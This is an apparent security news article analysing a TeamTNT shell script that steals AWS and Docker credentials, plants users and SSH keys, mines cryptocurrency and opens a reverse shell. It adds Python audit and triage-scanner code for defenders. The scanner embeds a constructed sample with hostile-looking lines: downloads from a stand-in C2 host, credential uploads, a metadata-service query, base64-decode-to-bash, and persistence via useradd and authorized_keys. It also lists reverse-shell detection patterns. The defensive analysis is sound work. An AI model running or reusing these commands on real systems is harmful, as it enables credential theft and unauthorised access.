2025-01-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Shulou(Shulou.com)05/31 Report--
This article presents an analysis of a malicious shell script that steals AWS and Docker credentials. Many readers have had questions about this kind of script, so the editor has consulted a range of sources and summarised the key points in a simple, practical form. Hopefully it answers those questions; please read on.
Researchers recently found an attack that uses shell scripts to carry out malicious activity. In earlier attacks of this kind, such scripts were used mainly to deploy cryptocurrency miners; in the recent attacks they do more than act as a miner downloader. From the C2 URLs, strings, encryption keys and language used in the sample, the researchers attribute the latest campaign to TeamTNT.
The malicious shell script is written in bash. Compared with similar attacks, the code is well structured and organised into functions with descriptive names:
Figure 1. Code snippet showing what each function does
The first function the shell script calls prepares the environment: it makes sure the resources needed for the next phases (further attacks, computing power, and so on) are available. It also checks whether a security solution is present on the host.
The shell script also downloads several grey-area tools for the next stage of the attack. These tools perform network scanning and mapping to find and map exposed, vulnerable container APIs.
Once the environment is set up, the script collects sensitive information, makes a copy of it, and uploads it to the C2 server.
Figure 2. Code snippet for stealing AWS credentials
In the previously found samples, the AWS credential theft only checked whether the credential file existed and uploaded it. The new sample adds two further paths: one requests the AWS instance metadata service and tries to obtain credentials from it; the other checks the AWS credential environment variables and, if they are set, uploads them to the C2 server. In addition, the new sample steals not only AWS credentials but also Docker API credentials.
Figure 3. Code snippet for stealing Docker API credentials
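The three credential locations described above (the static AWS credential file, AWS environment variables and the Docker client config) are exactly what a defender should audit on container hosts. The following Python audit helper is an added example, not code from the analysed sample or from the researchers; it builds a throwaway home directory with constructed, fake credential files and reports exposure by metadata only (file mode, variable names, whether Docker stores inline `auth` entries) without reading secret values back. The registry name, key values and `upload`-free design are assumptions for the demo.

```python
import json
import stat
import tempfile
from pathlib import Path

# Added audit helper (not the analysed sample's code). It looks at the places the
# article says the script targets: the static AWS credential file, AWS_* environment
# variables and the Docker client config. Only metadata is reported; no secret value
# is read back or printed.

AWS_ENV_NAMES = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")


def audit_credential_exposure(home: Path, env: dict) -> list[str]:
    """Return a list of finding tags for the given home directory and environment."""
    findings = []

    # 1. Static AWS credential file: report presence and whether group/other can read it.
    aws_creds = home / ".aws" / "credentials"
    if aws_creds.is_file():
        mode = stat.S_IMODE(aws_creds.stat().st_mode)
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append(f"aws-file-readable-by-others:{oct(mode)}")
        else:
            findings.append("aws-file-present")

    # 2. Credentials exposed through environment variables (the new path the sample added).
    present = [name for name in AWS_ENV_NAMES if env.get(name)]
    if present:
        findings.append("aws-env-vars:" + ",".join(present))

    # 3. Docker client config: an inline "auth" entry is base64(user:password) on disk,
    #    whereas credsStore/credHelpers delegate to an OS credential store.
    docker_cfg = home / ".docker" / "config.json"
    if docker_cfg.is_file():
        cfg = json.loads(docker_cfg.read_text())
        inline = sorted(reg for reg, entry in cfg.get("auths", {}).items() if entry.get("auth"))
        if inline:
            findings.append("docker-inline-auth:" + ",".join(inline))
        if "credsStore" in cfg or "credHelpers" in cfg:
            findings.append("docker-cred-helper")

    return findings


def build_constructed_home() -> Path:
    """Create a throwaway home directory with constructed (fake) credential files."""
    home = Path(tempfile.mkdtemp(prefix="audit-demo-"))
    (home / ".aws").mkdir()
    creds = home / ".aws" / "credentials"
    creds.write_text("[default]\naws_access_key_id = AKIAEXAMPLEPLACEHOLDER\n"
                     "aws_secret_access_key = PLACEHOLDER\n")
    creds.chmod(0o644)  # deliberately too permissive for the demo
    (home / ".docker").mkdir()
    (home / ".docker" / "config.json").write_text(json.dumps({
        # "dXNlcjpwYXNz" is base64("user:pass"), a constructed value
        "auths": {"registry.example.invalid": {"auth": "dXNlcjpwYXNz"}},
    }))
    return home


def demo() -> list[str]:
    """Run the audit against the constructed home and a constructed environment."""
    home = build_constructed_home()
    env = {"AWS_ACCESS_KEY_ID": "AKIAEXAMPLEPLACEHOLDER", "AWS_SECRET_ACCESS_KEY": "PLACEHOLDER"}
    return audit_credential_exposure(home, env)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The metadata-service path cannot be audited from disk; the matching mitigation is to require IMDSv2 session tokens on the instance and to keep the metadata hop limit at 1 so that bridged containers cannot reach the endpoint at all. For the on-disk findings, the fixes are mode 0600 on the credential file, short-lived role credentials instead of static keys in the environment, and a Docker credential helper instead of inline `auth` entries.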
Between stealing credentials and deploying the cryptocurrency miner, the script also drops another base64-encoded sample. Its job is to create sudo-capable users on the system and install SSH-RSA keys so that the attackers can reconnect to the infected machine and maintain access.
Figure 4. Code snippet showing the user creation
The script then downloads, deploys and runs the cryptocurrency miner. The most recently added final step of this attack is the deployment of a reverse shell.
So far this attack mainly targets container platforms. Recently, more than 2,000 container images containing the malicious samples have been downloaded.
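The stages described so far (environment preparation and security-tool checks, scanner download, AWS and Docker credential collection, a base64-encoded second stage, sudo user and SSH key persistence, miner deployment, reverse shell) map naturally onto a triage scanner for shell scripts found on a host. The following Python scanner is an added example, not code from the researchers or the analysed sample: the regular expressions are coarse heuristics of my own choosing (tool names such as masscan or nmap and the stratum mining protocol are assumptions, not indicators taken from the article), and the embedded script is a constructed, non-functional sample that merely references the indicators so the scanner has something to match.

```python
import re
from collections import defaultdict

# Added heuristics keyed by the behaviour stages the article describes. These are
# assumptions for the demo, not indicators from the analysed sample; treat hits as
# triage signals for a human reviewer, not as a verdict.
STAGE_PATTERNS = {
    "env-prep/security-check": [
        r"\b(systemctl|service)\s+(stop|disable)\b",
        r"\bsetenforce\s+0\b",
        r"\bufw\s+disable\b",
    ],
    "tooling-download": [r"\b(curl|wget)\b[^\n]*\b(masscan|zgrab|nmap)\b"],
    "aws-cred-theft": [
        r"\.aws/credentials",
        r"169\.254\.169\.254",          # instance metadata service
        r"\$\{?AWS_SECRET_ACCESS_KEY",  # credential read from the environment
    ],
    "docker-cred-theft": [r"\.docker/config\.json"],
    "staged-payload": [r"base64\s+(-d|--decode)[^\n]*\|\s*(ba)?sh\b"],
    "persistence-user-ssh": [r"\buseradd\b", r"/etc/sudoers", r"authorized_keys"],
    "miner": [r"stratum\+tcp://"],
    "reverse-shell": [r"/dev/tcp/", r"\bnc\b[^\n]*\s-e\s"],
}


def scan_script(text: str) -> dict:
    """Map each matched stage to the 1-based line numbers where it was seen."""
    hits = defaultdict(list)
    for lineno, line in enumerate(text.splitlines(), 1):
        for stage, patterns in STAGE_PATTERNS.items():
            if any(re.search(p, line) for p in patterns):
                hits[stage].append(lineno)
    return dict(hits)


def triage(hits: dict) -> str:
    """Rate the script: credential theft combined with persistence or a second stage is the strongest signal."""
    stages = set(hits)
    theft = {"aws-cred-theft", "docker-cred-theft"}
    follow_on = {"persistence-user-ssh", "reverse-shell", "staged-payload"}
    if stages & theft and stages & follow_on:
        return "high"
    if stages & (theft | follow_on):
        return "medium"
    return "low" if stages else "none"


# Constructed sample that only references the indicators; upload_to_c2 and run_miner
# are undefined placeholder names, and the reverse shell line is a comment.
SAMPLE_SCRIPT = """#!/bin/bash
# constructed sample for exercising the scanner; not the analysed malware
C2HOST="c2.example.invalid"
setenforce 0
systemctl stop apparmor
wget -q "http://$C2HOST/tools/masscan" -O /tmp/.m
[ -f ~/.aws/credentials ] && upload_to_c2 ~/.aws/credentials
curl -s http://169.254.169.254/latest/meta-data/ > /tmp/.meta
[ -n "$AWS_SECRET_ACCESS_KEY" ] && upload_to_c2 env
[ -f ~/.docker/config.json ] && upload_to_c2 ~/.docker/config.json
echo "$STAGE2" | base64 -d | bash
useradd -m svc_user
echo "$PUBKEY" >> /home/svc_user/.ssh/authorized_keys
run_miner stratum+tcp://pool.example.invalid:3333
# reverse shell via /dev/tcp/$C2HOST/$C2PORT (command elided)
"""


if __name__ == "__main__":
    hits = scan_script(SAMPLE_SCRIPT)
    for stage, lines in hits.items():
        print(f"{stage:26} lines {lines}")
    print("triage:", triage(hits))
```

Because the heuristics match strings rather than parsing the shell, a comment mentioning `/dev/tcp/` scores the same as a live command (the sample's last line shows this); that is acceptable for triage but means the output should be paired with process and network telemetry from the host before any response action.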
Figure 5. Screenshot of container image containing malicious samples
This concludes the analysis of the malicious shell script that steals AWS and Docker credentials. Hopefully it has answered your questions; combining theory with practice is the best way to learn, so go and try it. To keep learning about related topics, please continue to follow this site, where the editor will keep publishing practical articles.
© 2024 shulou.com SLNews company. All rights reserved.